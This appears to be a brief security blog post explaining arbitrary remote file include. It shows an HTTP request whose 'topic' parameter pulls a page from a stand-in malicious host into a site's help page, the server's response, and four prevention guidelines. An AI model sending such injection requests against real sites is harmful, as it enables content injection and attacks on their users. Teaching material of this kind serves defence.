So you’ve tested executing remote files with Cross-Site Scripting and Parameter Redirection. What else can you do with that parameter?

Although there are many different additional tests you can perform for parameter based vulnerabilities, let’s review Arbitrary Remote File Includes in this post.


In this example, I am calling a remote arbitrary file to embed within the help page:

GET /help.html?topic=malicious-site.com/serverinclude.html?/frame.html HTTP/1.1
Referer: httphacker.com/help.html
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/5.0 Gecko/20110614 Firefox/3.6.18
Host: httphacker.com
Connection: Keep-Alive
Cookie: JSESSIONID=0CA009C2


The Include occurs and now poses as a threat to any who executes the the malicious link:

HTTP/1.1 200 OK
Date: Mon, 25 Mar 2013 23:21:16 GMT
Server: Apache/2.2.22 (Win32) mod_ssl/2.2.22 OpenSSL/0.9.8t mod_jk/1.2.37
Content-Language: en-US
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 6397

<div class=”span8″>
<html><body text=”white”>Server Include Vulnerability</body></html>
</div>


To prevent Arbitrary Remote File Include Vulnerabilities, you need to follow these 4 basic guidelines:

  • Define what is allowed. Ensure that the web application validates all input parameters (cookies, headers, query strings, forms, hidden fields, etc.) against a stringent definition of expected results.
  • Check the responses from POST and GET requests to ensure what is being returned is what is expected, and is valid.
  • Verify the origin of scripts before you modify or utilize them.
  • Do not implicitly trust any script given to you by others (whether downloaded from the web, or given to you by an acquaintance) for use in your own code.